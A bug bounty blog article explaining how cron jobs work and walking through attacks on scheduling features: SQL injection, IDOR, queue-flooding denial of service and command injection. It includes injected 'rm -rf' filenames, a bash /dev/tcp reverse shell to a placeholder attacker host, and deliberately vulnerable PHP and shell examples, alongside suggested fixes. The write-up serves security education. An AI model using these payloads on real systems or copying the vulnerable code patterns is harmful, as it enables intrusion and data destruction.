Cronjobs for hackers (bugbounty article)


Fares Walid (SirBugs)

Hi folks 😀

I usually start most of my reports with “Hi folks 😀”, unless I’m actually upset with them. Bugbounty has its downsides too.

I am 21 years old, from Egypt. I joined the cybersecurity penetration testing field in November 2022.

I actually shifted to this field from scripting, writing small programs, and building automation tools, because I loved it.

A lot of my friends were into it too, which made it even more interesting to me.

I started doing bugbounty at the beginning of 2023, and now I am working as a Security Consultant at the strongest cybersecurity company in Egypt.

I do bugbounties part time now, because there have been a lot of scams over the previous months. Some good moments, some bad moments, and it goes like that.

So, shall we keep going?

Most programs didn’t appreciate this kind of bug. Most of them said it’s normal .. it’s acceptable risk .. OOS .. blablabla :D

The impact wasn’t enough for them, or they just didn’t want to pay xD

I started focusing on this area lately, over the previous 9 or 10 months, after I came across a talk about cronjobs.

Luckily, within a few days of reading it, I ran into a functionality that used cronjobs while I was testing!

I said it’s my time, I guess. It was a DoS and I could exploit it easily.

Later on, I started loving this area, and researched more about how cronjobs are handled.

Once I had studied it well, I came to a target and poisoned the data of other users’ cronjobs.

A month after these cases, I managed to exploit a command injection via the cronjob handlers 😀

But anyway, I still find vulns like this one while I am testing in some programs.

So let’s start the technical part now 😀

Cronjobs are automated commands or scripts executed at set intervals on Unix-based systems, used widely for maintenance, monitoring, extractions, withdrawals, importing and automation tasks.

Companies usually need to do some things manually and repeatedly: daily, weekly, monthly, maybe yearly!

Or maybe on a user request! When the user asks for something, go fetch it for him, which takes some time.

Imagine John logging in every day at 2 AM to run a backup ..

He goes in every day at 2 AM and runs /usr/local/bin/backup.sh on the company’s server.

Can you picture that? We need something to do it for us every day.

Why don’t we just use a while loop that runs the command, sleeps for 24 hours, then repeats it again and again, keeping it running as a process on the machine?
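For the sake of argument, that loop approach might be sketched like this (a toy version with a short interval and a run limit so it terminates; the real thing would sleep 24 hours):

```python
import time

def naive_daily_runner(job, runs=3, interval_s=0.01):
    """What 'while true; do job; sleep 24h; done' boils down to: the process
    must stay resident forever, and the sleep only starts after the job
    finishes, so the schedule drifts by the job's own runtime every cycle."""
    for _ in range(runs):
        job()
        time.sleep(interval_s)  # 24 * 60 * 60 in the real version

calls = []
naive_daily_runner(lambda: calls.append(1))
print(len(calls))  # 3
```

The next points explain why cron beats this model.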

Loops continuously consume resources by keeping the script and its shell environment running in memory.

This can lead to unnecessary CPU and memory usage, particularly when tasks are scheduled far apart (e.g., every hour or day). In contrast, cron jobs only run when scheduled, freeing up system resources.

Loops relying on sleep intervals can encounter drift (small timing inaccuracies over time), leading to scheduled jobs running later than intended.

System sleep states, reboots, or network interruptions can disrupt loops, potentially halting the script. Cronjobs, in contrast, are managed by the cron daemon, which handles such situations gracefully, ensuring jobs resume as expected after reboots or network issues.

The cron daemon runs as a system service, creating job logs by default in /var/log/cron or similar log files, making it easy to monitor and debug tasks. Loops, however, do not offer built-in logging, requiring additional code for monitoring, error handling, and recovery if the script fails or encounters errors.

Cronjobs enable running multiple tasks independently.

For loops, you’d need separate processes or careful handling to ensure tasks don’t interfere with one another, complicating the setup.

There are many, many use cases for cronjobs:

- Daily database backup: 0 2 * * * /usr/local/bin/backup.sh. Runs a backup script at 2:00 AM every day, often used for database backups.
- Clearing cache weekly: 0 0 * * 0 rm -rf /var/www/html/cache/*. Every Sunday at midnight, this job clears the cache folder for a web application, freeing up storage.
- Monitoring disk usage and emailing alerts: 0 * * * * /usr/local/bin/check_disk.sh | mail -s "Disk Usage Alert" admin@example.com. Runs hourly, checking disk space; if usage exceeds a threshold, it sends an alert email.
- System updates: 0 4 * * 1 apt-get update && apt-get upgrade -y. Every Monday at 4:00 AM, this job updates system packages, ensuring security patches are applied weekly.
- Restarting a web server every day: 0 5 * * * systemctl restart apache2. Restarts the Apache server every day at 5:00 AM, which can help prevent memory leaks or service issues.
- Sending monthly reports: 0 9 1 * * /usr/local/bin/generate_report.sh | mail -s "Monthly Report" report@example.com. On the first day of every month at 9:00 AM, this job generates and emails a monthly report.
- Data pulls, money withdrawals, image processing, and others.

We will study what this structure means in detail in a later section.

Cronjobs operate based on the cron daemon, a background service that checks and executes tasks at specified intervals. Here’s a more technical breakdown of how it operates:

- On startup, the cron daemon reads configuration files (usually /etc/crontab and user-specific crontab files located in /var/spool/cron/crontabs).
- It loads the scheduled jobs into memory and monitors these files for changes.
- On Unix-based systems, cron runs as a lightweight background daemon, started automatically on boot by the init system.
- Each cronjob entry in a crontab file consists of five time-and-date fields, plus a command field.
- Cron interprets these fields based on the cron syntax, where each field specifies a particular time unit (minute, hour, day of the month, etc.).
- The daemon parses each entry, creating an internal scheduling queue that it checks every minute.
- Every minute, cron checks the system clock and compares the current time to the schedule in each entry. If there’s a match, it triggers the associated command.
- When a job is scheduled to run, cron forks a new process for the command, allowing the daemon itself to continue without interruption. This forked process is responsible for executing the specified command or script.
- Cron sets environment variables (like SHELL, HOME, PATH) in the job’s context before executing it, ensuring the job has the necessary environment to run.
- Cron jobs typically log outputs and errors to system logs, usually /var/log/syslog or /var/log/cron. If you rolled your own scheduler, you would have to handle this yourself, which means more code.
- If a job produces output, cron attempts to email it to the user specified in the job’s MAILTO variable (or the job owner if none is specified).
- If a job fails or encounters an error, cron logs the error and continues with the next scheduled task.
- Cron can handle multiple jobs concurrently. Each job runs in isolation in its own forked shell process, so multiple jobs scheduled at the same time execute in parallel, each with its own environment variables and context.
- Cron jobs don’t persist in memory if the system reboots. After a restart, the cron daemon resumes and reloads the cron tables; with a hand-rolled loop, you would have to relaunch it yourself on every restart. Some systems support special strings like @reboot to specify jobs that should run once after every system boot, addressing cases where tasks must be triggered on startup.
- Whenever a user or administrator updates a crontab file using commands like crontab -e, the cron daemon detects the change and reloads the updated cron tables. This reload is lightweight, since the daemon only checks for timestamp changes on the files rather than constantly rereading the entire file set.

This process enables cron jobs to run reliably without consuming unnecessary resources, using a simple yet powerful model for scheduling and executing tasks.
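To make the minute-by-minute matching concrete, here is a toy sketch of the check (my own illustration; it handles only '*' and plain numbers, nothing like a full cron parser):

```python
import datetime

def field_matches(field, value):
    """Tiny subset of cron field matching: '*' or a single number only."""
    return field == "*" or int(field) == value

def due_now(entry, now):
    """entry: 'MIN HOUR DOM MON DOW command...' -- roughly the comparison
    cron runs against the clock every minute."""
    minute, hour, dom, mon, dow = entry.split()[:5]
    return (field_matches(minute, now.minute)
            and field_matches(hour, now.hour)
            and field_matches(dom, now.day)
            and field_matches(mon, now.month)
            and field_matches(dow, now.isoweekday() % 7))

now = datetime.datetime(2024, 11, 5, 2, 0)
print(due_now("0 2 * * * /usr/local/bin/backup.sh", now))  # True: it's 2:00 AM
```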

Cron-like functionality exists in various programming languages, either as modules or frameworks, allowing scheduled tasks without relying directly on the system’s cron service.

Python

from apscheduler.schedulers.blocking import BlockingScheduler

def job():
    print("Executing scheduled task")

scheduler = BlockingScheduler()
scheduler.add_job(job, 'cron', hour=3, minute=30)  # Runs daily at 3:30 AM
scheduler.start()

Go

package main

import (
    "fmt"

    "github.com/robfig/cron/v3"
)

func main() {
    c := cron.New()
    c.AddFunc("30 3 * * *", func() { fmt.Println("Running daily job at 3:30 AM") })
    c.Start()

    select {} // Prevent the program from exiting
}

PHP (Laravel)

// In App\Console\Kernel.php
protected function schedule(Schedule $schedule)
{
    $schedule->call(function () {
        // Task code here
    })->dailyAt('3:30');
}
Node.js

const cron = require('node-cron');

cron.schedule('30 3 * * *', () => {
    console.log('Running a job at 3:30 AM every day');
});

Ruby (whenever gem)

every 1.day, at: '3:30 am' do
  runner "MyModel.some_method"
end

A cron entry follows a specific format to define the timing, day, and frequency of execution. Each line in a crontab file represents one cron job and consists of five time-and-date fields, followed by the command to execute:

* * * * * command-to-run
│ │ │ │ │
│ │ │ │ └── Day of the week (0–7, where 0 and 7 are Sunday)
│ │ │ └──── Month (1–12)
│ │ └────── Day of the month (1–31)
│ └──────── Hour (0–23)
└────────── Minute (0–59)

Are there modules dedicated to handling cronjobs and running commands repeatedly?

YES!

Python:

- schedule: a lightweight library for simple job scheduling. Great for interval-based jobs.
- APScheduler (Advanced Python Scheduler): offers flexibility for cron-like schedules, date-based tasks, and interval-based tasks, making it suitable for more complex scheduling needs.
- python-crontab: provides access to system cron from within Python, allowing you to create, update, and delete cron jobs in the system crontab file.

Node.js:

- node-cron: a popular cron library that supports standard cron expressions to run scheduled tasks.
- agenda: a job scheduling library based on MongoDB, suitable for complex task handling; supports retries, concurrency, and priorities.
- bree: a straightforward library for job scheduling in Node.js, optimized for both short and long-running jobs.

Ruby:

- whenever: a Ruby gem that generates cron jobs using a Ruby DSL, making it easy to integrate into Rails applications.
- rufus-scheduler: provides in-process job scheduling that doesn’t rely on the system cron. It supports cron syntax, intervals, and time-based scheduling.

PHP:

- Laravel Scheduler: part of the Laravel framework, allowing users to define scheduled tasks within the application code instead of directly managing cron jobs.
- crontab-manager: a PHP package that provides simple management of cron jobs via PHP.

Java:

- Quartz Scheduler: a powerful scheduling library supporting complex job scheduling for Java applications. It can handle jobs based on calendar intervals, cron expressions, and even dependencies.
- Spring Task Scheduler: integrated within the Spring framework, allowing cron-style scheduling and interval-based tasks using Spring’s @Scheduled annotation.

Go:

- robfig/cron: a cron library for Go that supports cron syntax and custom scheduling intervals. It’s widely used in production environments for background job scheduling.
- go-cron: provides cron-based scheduling with a simple API, suitable for Go applications that require periodic background tasks.

A cronjob in an application I was doing bugbounty on took a cronjob ID.

How will the system know that this exporting process, for example, belongs to a specific user? Normally, they keep something like an array in the DB for each user containing his process IDs.

After the process finishes, the results are sent by mail.

The request was in JSON, taking the following post data:

{
    "Proccess": ["123456"]
}

where 123456 is the process UUID related to this user only. If we tried to add more than one ID/UUID to this array, like:

{
    "Proccess": ["123456", "456789"]
} // we would need the loop then! not only one direct query ..

we would get an error: this process is not related to you :D

But what about fetching processes of other users not related to me? With:

{
    "Proccess": ["123456 , 456789"]
}

YES it worked, do you know why?

-- Vulnerable query example
SELECT * FROM export_data WHERE process_id IN ({process_ids});

user_input = "123, 456, 789"  # user-controlled: multiple IDs smuggled inside one array element
query = f"SELECT * FROM export_data WHERE process_id IN ({user_input});"

The backend takes the single array element and splices it directly into the query. Without sanitizing this input, it’s vulnerable!
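Here is a self-contained reproduction of that pattern with sqlite3 (a sketch only; the target’s real backend and schema are unknown, so the table and column names are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE export_data (process_id INTEGER, owner TEXT)")
conn.executemany("INSERT INTO export_data VALUES (?, ?)",
                 [(123456, "me"), (456789, "victim")])

# Vulnerable pattern: the single array element is spliced into the SQL
# verbatim, so "123456 , 456789" turns into TWO ids inside IN (...)
user_input = "123456 , 456789"
leaked = conn.execute(
    f"SELECT owner FROM export_data WHERE process_id IN ({user_input})"
).fetchall()
print(leaked)  # both rows come back, including the victim's

# Fixed pattern: one placeholder per array element, so the whole string
# is bound as a single value that matches nothing
ids = [user_input]
placeholders = ",".join("?" for _ in ids)
safe = conn.execute(
    f"SELECT owner FROM export_data WHERE process_id IN ({placeholders})",
    ids
).fetchall()
print(safe)  # []
```

The ownership check ("is this process in the caller’s processes array?") still has to happen on top of parameterization.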

Another Scenario!

A web application lets users upload files, and the filenames are stored in a database. Every minute, a cron job runs to process these files and log their contents for later retrieval. Unfortunately, the cronjob script constructs a shell command using unsanitized filenames, leading to command injection.

You know the reason? It’s simple, I know it! I imagined the code was something like:

<?php
if ($_FILES['file']['error'] == UPLOAD_ERR_OK) {
    $filename = basename($_FILES['file']['name']);
    $target_path = "/uploads/" . $filename;

    move_uploaded_file($_FILES['file']['tmp_name'], $target_path);

    $conn->query("INSERT INTO uploaded_files (filename) VALUES ('$filename')");
    echo "File uploaded successfully!";
} else {
    echo "File upload failed.";
}
?>

Cronjob Shell Script:

#!/bin/bash
# process_files.sh
files=$(mysql -u username -p'password' -D database -e "SELECT filename FROM uploaded_files")

for file in $files; do
    # Building a command string and running it through eval is what makes the
    # injection fire -- a plain quoted `cat "/uploads/$file"` would only fail
    # to find the file, not execute what's inside the name.
    eval "cat /uploads/$file >> /var/log/file_contents.log"
done

How did I exploit this?

The cron job does not sanitize the $file variable before splicing it into a shell command. This allows an attacker to inject shell commands through the filename.

The attacker uploads a file with a crafted filename: innocent.txt; rm -rf /important_data; echo

This filename contains a rm -rf command injection that, when executed, will delete files.

Trigger the Vulnerable Cron Job:

- The filename innocent.txt; rm -rf /important_data; echo is saved to the database.
- The cron job retrieves the filename and constructs the command: cat /uploads/innocent.txt; rm -rf /important_data; echo >> /var/log/file_contents.log
- When the cron job runs, rm -rf /important_data is executed, deleting important data.

This let me exploit a command injection successfully 😀
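The straightforward fix (my suggestion, not the program’s actual patch) is to whitelist filenames before they ever reach the database or a shell:

```python
import re

SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")

def safe_filename(name):
    """Reject anything outside a strict whitelist -- spaces, semicolons,
    and other shell metacharacters never get a chance to be interpreted."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected filename: {name!r}")
    return name

print(safe_filename("innocent.txt"))  # innocent.txt
# safe_filename("innocent.txt; rm -rf /important_data; echo") -> ValueError
```

Whitelisting beats blacklisting here: you only have to enumerate what a filename is allowed to be, not everything a shell might abuse.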

The real code may be different, but this is what I imagined!

Later, an IDOR was detected that allowed me to poison, modify, and add cronjobs belonging to other users!

A web application allows users to set up periodic tasks, such as automated data exports or file processing. The tasks are stored in a database and later processed by a server-side cron job that reads from this database. Due to an IDOR vulnerability, the attacker can modify or add tasks to other users’ accounts, which are then executed by the cronjob with the permissions of the victim’s account.

Imagine the following code:

tasks=$(mysql -u username -p'password' -D database -e "SELECT command FROM user_tasks WHERE user_id = $USER_ID")

for task in $tasks; do
    # Execute each task
    eval "$task"
done

Web Application’s Task Scheduling Feature: Users can create periodic tasks in the application, which are stored in the user_tasks table with a structure like:

user_tasks (
    id INT PRIMARY KEY,
    user_id INT,
    command TEXT,
    schedule VARCHAR(255)
)

The user can define the command that gets executed at the specified schedule, which the cron job later pulls and executes.

The application’s endpoint for scheduling tasks does not properly validate the user_id associated with the task, allowing users to modify the user_id to affect other users’ tasks:

For example, the API endpoint to add a task might look like this:

POST /api/v1/schedule_task

{
    "user_id": 1001,                     # target user ID, changed to point at another user
    "command": "rm -rf /important_data", # malicious command to delete files
    "schedule": "*/5 * * * *"
}
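The root cause is trusting the client-supplied user_id. A hypothetical fixed handler (names invented for illustration) derives ownership from the authenticated session instead:

```python
def schedule_task(session_user_id, payload):
    """Hypothetical fixed endpoint logic: the task owner always comes from
    the server-side session, never from the request body."""
    if "user_id" in payload and payload["user_id"] != session_user_id:
        raise PermissionError("cannot schedule tasks for another user")
    return {
        "user_id": session_user_id,  # forced, regardless of the body
        "command": payload["command"],
        "schedule": payload["schedule"],
    }

# The attack above now fails for an attacker logged in as user 2002:
# schedule_task(2002, {"user_id": 1001, "command": "...", "schedule": "*/5 * * * *"})
# -> PermissionError
```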

We will come back to the schedule parameter a little later too xD

Now imagine the IDOR was in exporting the cronjob results:

POST /api/v1/export_output

{
    "process": 23468234555
}

If this process parameter was vulnerable to IDOR!

Because the server doesn’t check whether the result belongs to the requesting user, we can replace this ID with anyone else’s and fetch their data easily!

That’s why the per-user processes_ids array is important: it keeps each user restricted to his own processes!

Using cronjobs to perform Denial of Service (DoS) attacks involves manipulating cronjobs to repeatedly execute resource-intensive tasks at high frequencies, overwhelming system resources such as CPU, memory, or disk space. This can lead to a slowdown or crash of the system, effectively rendering services unusable.

- High-frequency scheduling: setting a cron job to run every second or minute with a resource-heavy task can exhaust system resources quickly.
- Looping resource-intensive commands: commands that perform large read/write operations, compute-intensive tasks, or recursive file deletions can be devastating when scheduled in quick succession.
- Uncontrolled log growth: misconfiguring cron jobs to produce excessive log output can rapidly fill up storage, causing the system to crash due to insufficient disk space.
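Purely as an illustration (hypothetical entries, do not run these on anything you care about), crontab lines like the following would hammer a box minute after minute:

```
* * * * * find / -type f -exec md5sum {} \;                   # CPU and disk heavy, every minute
* * * * * dd if=/dev/zero of=/tmp/fill bs=1M count=1024       # grows disk usage fast
* * * * * /usr/local/bin/huge_report.sh >> /var/log/huge.log  # uncontrolled log growth
```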

and there are too many other scenarios.

A Scenario!

I was testing one of the most popular meeting-rescheduling and timeline applications on HackerOne, doing some great work with my collaborator Ayman (hackerone@0xa1mn).

The administrator can schedule actions to be performed on a user when he applies through our form/application.

Like selecting: send him a welcome message after 1 minute, send him an ad after 6 hours, send him a confirmation message after 12 hours, and other actions within specific time frames.

But it was limited in the UI to 5 actions only. Can you guess what I was thinking?

In the request, I added more and more and more actions, which within 3 or 4 workflows caused a full DoS for the whole organization.

The team awarded me $150, which is low because DoS was OOS. But if it wasn’t, it would have been a great one tbh 😀

Another one. This wasn’t accepted at first because DoS was OOS too. IDK why it’s OOS tbh, come on, it’s a good bug .. But anyway, they awarded me and Ayman $100 too 😀

The bug here was in the exporting function! I could export data for all of my users (even ones I no longer see in the UI because they are very old), or within a specific timeframe, or similar .. This may take the application some time, so they used cronjobs.

But there’s nothing good forever xD

They limited the requests for pulling data to 1 request per 30 minutes.

But since this was vulnerable to a race condition, we could make maybe 100 requests per 30 minutes from one account 😀

Repeating the exploitation across 10 or 15 more accounts dropped the whole functionality of the application. The queue was full.
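The limiter most likely followed a check-then-update pattern with a gap between the check and the write. This toy Python model (my reconstruction, with a 1 ms sleep standing in for the database round-trip) shows how parallel requests slip through:

```python
import threading, time

class NaiveRateLimiter:
    """Check-then-update limiter with no locking -- a sketch of the
    '1 export per 30 minutes' guard."""
    def __init__(self, min_interval=1800):
        self.min_interval = min_interval
        self.last_run = 0.0

    def try_start(self):
        if time.time() - self.last_run < self.min_interval:
            return False
        time.sleep(0.001)            # the race window (simulated DB round-trip)
        self.last_run = time.time()
        return True

limiter = NaiveRateLimiter()
results = []
barrier = threading.Barrier(20)

def worker():
    barrier.wait()                   # fire all 20 "requests" at once
    results.append(limiter.try_start())

threads = [threading.Thread(target=worker) for _ in range(20)]
for t in threads: t.start()
for t in threads: t.join()
print(sum(results))  # many runs slip through, not just 1
```

All threads pass the time check before any of them has written last_run, so the limit collapses; the fix is to make the check-and-update atomic (a lock, or an atomic conditional update in the database).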

More than one element to handle!

This bug was in a public BB program, but I guess I can’t disclose its name either.

The request took some of my files and passed them to internal analysis by an OCR module, as the documentation said. This also happened via cronjobs.

They processed my files, limited to 12 files per request, like:

POST /api/v1/review

{
    "file": [
        "0274a497-ff98-4f4f-b084-2bbb5062e841",
        "6fcd44f4-87ad-48c7-8857-a8e44daf20f2",
        "599e66e0-4364-4a04-ae6f-e6a78933b8fd",
        ...
    ]
}

But this limit was UI-only. I passed more than 12 files, even the same file ID multiple times ..

Which in a few moments flooded the function for the whole organization, from a low-role account!

Cron job module exploitation involves leveraging vulnerabilities within libraries, modules, or packages designed to manage scheduled tasks, especially in application-level cron job frameworks across different programming languages. Attackers can exploit these vulnerabilities to gain unauthorized access, execute arbitrary commands, or manipulate job scheduling.

- Command injection in job definitions: many cron job modules allow job definitions that include shell commands. If these commands are constructed insecurely, an attacker can inject malicious code.
- Access control bypass: some modules may lack strict access control, allowing users to view, modify, or delete cron jobs outside of their privileges.
- Deserialization vulnerabilities: certain cron modules store job definitions as serialized objects, which, if not properly validated, can be exploited to execute arbitrary code.
- Improper input sanitization: cron modules that allow custom parameters in jobs may not properly sanitize inputs, opening the door for code or SQL injection.
- Path manipulation: modules that rely on file paths or environment variables for execution can be exploited if the attacker can control these variables or paths.

These modules have their own CVEs too! The modules themselves get vulnerable, so don’t forget to try to detect which technologies or modules are in use; it makes you more effective!

You can depend on:

- Banner grabbing and fingerprinting.
- Endpoint discovery and analysis: some libraries or frameworks expose specific endpoints (e.g., /scheduler for task scheduling APIs in Python or /jobs for Laravel Scheduler). Attackers can look for these endpoints by enumerating known paths or using tools like ffuf.
- Open ports and service detection: certain modules may open specific ports or services that can be detected by port scanning tools like Nmap. For example, Celery often uses message brokers like RabbitMQ on port 5672 (AMQP) or Redis on port 6379.
- JavaScript and CSS files: some modules load JavaScript or CSS files on the client side, which can include identifying paths or version information. Tools like Wappalyzer can detect JavaScript libraries and frameworks.
- Configuration files and public repositories: configuration files (e.g., .env, appsettings.json for .NET, config/schedule.rb for Ruby) can leak information about the libraries in use. If these files are publicly accessible or mistakenly committed to public repositories (like GitHub), they can reveal specific modules.

Scheduled Task Exhausting is a type of denial-of-service (DoS) attack where an attacker overloads the system by scheduling an excessive number of resource-intensive tasks or configuring tasks to run at very high frequencies. This can exhaust system resources, including CPU, memory, and disk space, leading to system slowdown, unresponsiveness, or crashes.

As someone who focuses on business logic errors in lows & mediums, and loves thinking about how to make functions toxic to themselves, I see this area as vulnerable to many bugs, leading to resource exhaustion and high bills later.

This was a previously found bug too. The application had a scheduling portal, with a table to manage the schedules.

It allowed re-scheduling some workflows within a specific time range, like creating schedules for this month only.

But how about bypassing this month and scheduling something for next month? NOW THE PAGE IS OVERLOADING AND NOT SHOWING ANYTHING!

This was closed as informative. IDK why, since it could be done by anyone in the team, not only the admin, but it’s OK. Welcome to the bugbounty world.

Can scheduling in the far future cause resource exhaustion?

If you read the beginning of the article, you’ll find we showed how this works!

We said the jobs are something like entries in files: cron checks all of their times and dates every minute; if a job is due now, execute, if not .. pass.

So how about scheduling 1,000,000 tasks for 2030?? Imagine checking all of those alongside every other task, every minute. What would the delay they cause look like? And other problems.

So if this isn’t handled, it can cause an overload for nothing!

Which could exhaust the server resources and sometimes DoS too.

So if you are a developer, always handle this well: make it make sense, and don’t accept arbitrary values.
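As a developer-side sketch (the limits are invented examples; tune them to the product):

```python
import datetime

MAX_HORIZON = datetime.timedelta(days=365)
MAX_TASKS_PER_USER = 50

def validate_schedule(run_at, user_task_count, now):
    """Guardrails against far-future and mass scheduling: bound how far
    ahead a task may be scheduled, and how many tasks one user may queue."""
    if run_at <= now:
        raise ValueError("schedule must be in the future")
    if run_at - now > MAX_HORIZON:
        raise ValueError("schedule too far in the future")
    if user_task_count >= MAX_TASKS_PER_USER:
        raise ValueError("too many scheduled tasks for this user")
    return True

now = datetime.datetime(2024, 11, 5, 10, 30)
print(validate_schedule(now + datetime.timedelta(days=7), 3, now))  # True
# validate_schedule(datetime.datetime(2030, 1, 1), 3, now) -> ValueError
```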

Converting Scheduled Time to the query!

Always, always, always, you will mostly find something like schedule_time in your request parameters, or a similar param responsible for the time the task runs at. When handling these tasks, users have to provide a time frame! A date to run on! Or even an interval to repeat at, like every 10 hours!

A web application allows users to schedule tasks at a specific date and time in the format YYYY-MM-DD HH:MM. The application backend parses this date and time and converts it to cron syntax for execution. However, due to improper sanitization of the scheduling_time input, an attacker can inject commands by manipulating the date and time value.

Users can submit a request to schedule a task by specifying a scheduling_time in a real date-and-time format. The request was something like:

POST /api/schedule_task
Content-Type: application/json

{
    "task": "backup_data",
    "scheduling_time": "2024-11-05 10:30"
}

Vulnerable Backend Code Imagination

$task = $_POST['task'];
$scheduling_time = $_POST['scheduling_time']; // Vulnerable to injection

$cron_time = date("i H d m", strtotime($scheduling_time)) . " *";
$command = "echo '$cron_time php /path/to/tasks/$task.php' | crontab -";
shell_exec($command);

Explanation

- $scheduling_time is passed straight through and converted into a cron time format without any validation.
- If scheduling_time contains extra shell commands, they are passed along into the crontab line, resulting in command injection. (In practice a strict parser like strtotime would return false on the tampered string; imagine the backend doing a sloppier string-based conversion that lets the raw value through.)

Crafting the malicious POST data

{
    "task": "backup_data",
    "scheduling_time": "2024-11-05 10:30; /bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1 #"
}

Explanation

- The ; allows the attacker to end the cron time syntax and start a new command.
- /bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1 opens a reverse shell to the attacker.
- The # at the end comments out any remaining cron job syntax to avoid syntax errors.

Injected Command in the Cron Job

echo '30 10 05 11 *; /bin/bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1 # php /path/to/tasks/backup_data.php' | crontab -
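The defensive counterpart, sketched in Python (the vulnerable app was PHP, but the same idea works there with DateTime::createFromFormat): parse the value strictly, so anything that is not exactly YYYY-MM-DD HH:MM is rejected before any shell command is ever built:

```python
import datetime

def to_cron(scheduling_time):
    """Strict conversion: strptime raises ValueError on anything that is not
    exactly 'YYYY-MM-DD HH:MM', so shell metacharacters never get through."""
    dt = datetime.datetime.strptime(scheduling_time, "%Y-%m-%d %H:%M")
    return f"{dt.minute} {dt.hour} {dt.day} {dt.month} *"

print(to_cron("2024-11-05 10:30"))  # 30 10 5 11 *
# to_cron("2024-11-05 10:30; /bin/bash -i ...") -> ValueError
```

Even with strict parsing, writing crontab entries through a shell pipeline is fragile; a crontab-management library is the safer route.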

In the end, I hope you had fun!

Written with love over 2 weeks, collecting bugs from the previous year :D

My accounts:

twitter: @SirBagoza

medium: @bag0zathev2

youtube: @cyberbugz

Thank you for your time ..

Best Regards.
